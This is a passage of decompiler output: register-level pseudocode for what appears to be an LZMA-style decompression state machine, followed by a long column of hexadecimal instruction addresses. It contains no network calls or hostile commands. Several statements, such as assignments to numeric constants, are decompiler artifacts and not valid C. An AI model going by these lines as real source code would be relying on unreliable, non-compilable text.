												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
